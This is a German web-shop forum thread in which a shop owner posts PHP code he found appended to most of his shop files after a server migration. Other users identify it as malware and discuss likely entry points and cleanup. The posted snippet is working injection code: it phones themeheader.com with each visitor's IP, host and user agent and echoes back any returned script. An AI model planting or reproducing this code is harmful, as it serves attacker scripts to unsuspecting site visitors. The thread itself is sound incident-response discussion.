Plötzlich Schadcode ????

[svenyo]

Hallo,

wir wollten soeben unseren Shop von Strato zu 1&1 umziehen. Haben alle Dateien lokal per FTP auf den Rechner gespeichert und danach bei 1&1 erneut hochgeladen. Jetzt wurde der Großteil der Dateien auf CHMOD 200 gesetzt, da anscheinden ein Schadcode enthalten sein soll.

Nach Überprüfung entsprechender Dateien, konnten wir lediglich folgenden Code ausfindig machen, der in den entsprechenden Dateien laut FTP-Änderungsdatum am selben Tag um die gleiche Uhrzeit aufgetaucht ist:

Code: PHP  [Auswählen]

<?php
#94b2b9#
error_reporting(0); @ini_set('display_errors',0); $wp_c4 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_c4) && !preg_match ('/bot/i', $wp_c4))){

$wp_c094="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_c4);

if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_c094); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_4c = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_4c = @file_get_contents($wp_c094);}

elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_4c=@stream_get_contents(@fopen($wp_c094, "r"));}}

if (substr($wp_4c,1,3) === 'scr'){ echo $wp_4c; }
#/94b2b9#
?>

 

Kann mir jemand sagen wo das herkommt und wie ich es wieder wegbekomme?

Gruß,
Sven

Linkback: https://www.modified-shop.org/forum/index.php?topic=32839.0

[Pfeiffer]

Sieht irgendwie nach WordPress aus, war bei Strato noch eine andere Webseite gehostet?

[svenyo]

Es sind noch mehrere Websites auf dem gleichen Webspace. Aber nur normale HTML-Seiten in separaten Ordnern mit eigenen Domains.

Das Komische ist, dass die betroffenen Dateien des Shops plötzlich alle als "Geändert Datum" den 24.03.2015 14:34 Uhr oder 14:35 Uhr ... eingetragen haben.

[webald]

Mir ist das ein bißchen zu unkonkret.

Es sind noch mehrere Websites auf dem gleichen Webspace. Aber nur normale HTML-Seiten in separaten Ordnern mit eigenen Domains.

Alles statisches HTML? Keine Formulare? Kein Javascript? Kein PHP?

wir wollten soeben unseren Shop von Strato zu 1&1 umziehen. Haben alle Dateien lokal per FTP auf den Rechner gespeichert und danach bei 1&1 erneut hochgeladen.

Was habt Ihr am Shop geändert? Könnte Ihr neu installieren und nur die Datenbank übernehmen?

Welche Dateien sind betroffen? Habt Ihr eine ältere Version oder sind alle aktuellen Fixes installiert worden?

[svenyo]

Hallo,

die anderen Websites sind alle statische HTML-Seiten. Kein Java, Kein PHP. Keine Formulare. Lediglich ein kleines Flash-Intro.

Der Shop lief seit ungefähr 6-8 Monaten auf Strato ohne Probleme. Seither wurde auch keine Änderung mehr vorgenommen. Lediglich Artikel hinzugefügt bzw. entfernt.
Aufgrund von Performance-Problemen möchten wir nun auf einen Managed Sever umziehen.

Shop Version ist 1.06-r4642 mit ein paar kleinen Änderungen. Lediglich eine Neu-Installation und Datenbank importieren ist also nur mit ein wenig Aufwand möglich.

[Matt]

Wer hat denn automatisiert gesperrt? Strato oder 1&1?

Ist das der Originalcode, den du gepostet hast? Die darin aufgerufene Domain scheint keinen Schadcode auszuliefern.

Auf den anderen Domains liegen auch keine Installationen von Wordpress/Shop/etc., die nicht benutzt werden? Solche vergessenen Installationen sind gern mal Einfallstor für Schadsoftware.

Dein Rechner ist sauber?

Das einfachste ist natürlich ein nicht kompromittiertes Backup zu nehmen und einzuspielen. Davor muss aber natürlich das Einfallstor gefunden und geschlossen werden.

[svenyo]

1&1 hat automatisch gesperrt.

Bei Strato ist der Shop immer noch ohne Probleme (außer die Ladezeiten) in Betrieb.

Der gepostete Code ist der original-Code, der an den Dateien überall ganz unten angehängt ist.
Rechner ist Sauber.

[Matt]

Das hab ich mir fast gedacht, dass 1&1 gesperrt hat. Findet sich denn der Schadcode dann auch auf dem Strato-Server so wieder?

[Pfeiffer]

Das hab ich mir fast gedacht, dass 1&1 gesperrt hat. Findet sich denn der Schadcode dann auch auf dem Strato-Server so wieder?

Da würde ich drauf wetten, das würde auch die miesen Ladezeiten erklären.

[svenyo]

Ja, der Code ist bei den Dateien auf dem Strato Server vorhanden.

Ich habe die von mir veränderten Dateien zusätzlich auf meinem Rechner gesichert. In weiser Voraussicht, falls einmal eine Neuinstallation notwendig sein sollte. Deshalb ist mir auch der zusätzliche "Code-Schnipsel" aufgefallen.

Handelt es sich hier wirklich um Schadcode? Oder wo kommt das her?

[hpzeller]

Hallo svenyo

Ja bei dem von dir geposteten Code handelt es sich um Schadcode!

Es wird versucht eine Verbindung mit Parameterübergabe zu 'http://themeheader.com' herzustellen und deren Antwort gegebenenfalls im Browser auszugeben.

Siehe auch hier –> http://stackoverflow.com/questions/24374357/php-hack-what-is-this-code-doing

PS:
Die wichtige Frage, die es zu beantworten gilt ist aber wie wurde dein Shop gehackt.

Gruss
Hanspeter

[Pfeiffer]

Svenyo schau mal bei Strato auch in deine anderen Ordner bzw. Domains und du wirst festellen daß der Code sich dort ebenfalls eingenistet hat. Ich würde wetten daß da noch irgendwo eine vergessene uralte Joomla oder Wordpress Installation zu finden ist. Dann wurde wahrscheinlich diese Sicherheitslücke zum hochladen genutzt und alle Ordner deines Webspaces infiziert. Wenn du jetzt bei 1&1 nur noch deinen Shop am laufen hast, bereinige die Dateien und du brauchst dir keine Sorgen mehr machen, weil ja die Hintertür weg ist.

[svenyo]

Hallo Hanspeter,

danke für deine Antwort. Aber wo kommt dieser Schadcode her? Es wurden nur CSV-Dateien mit Artikeldaten importiert. Kann man das irgendwo nachvollziehen?
Denn das komische ist, dass es plötzlich an fast allen PHP-Dateien so aussieht. Kann es irgendein Strato-Plugin oder sowas sein, dass mal versehentlich eingeschaltet wurde oder ähnliches?

Gruß,
Sven

[svenyo]

Habe im Forum gerade diesen Thread gefunden:

http://www.modified-shop.org/forum/index.php?topic=30636.0

Ich bin also nicht alleine. Fragt sich jetzt wirklich wie der Schädling in den Shop kam. Hat jemand ne Idee wie man das rausfinden kann?

[matchangler]

Hallo Sven,

Wir hatten das Problem auch schon mal. bei uns lag es letztendlich am Filezilla - dem FTP Übertragungsprogramm. Wir hatten unwissentlich eine manipulierte Datei/Update von der Herstellerseite geladen. Details dazu gibts auf der Heise Seiite http://www.heise.de/security/meldung/Trojanisierte-FileZilla-Version-greift-Zugangsdaten-ab-2099232.html.

Dadurch konnten im Dateirechte manipuliert werden. Die Zugangsdaten speichert Filezilla dubioser Weise im Klartext ab... Wir sind dann auf ein commerzielles FTP-Programm gewechselt. Seit ist Ruhe mit den gehackten Webseiten.

Ich hoffe es hilft auch anderen betroffenen Shop-Betreibern. vg Maik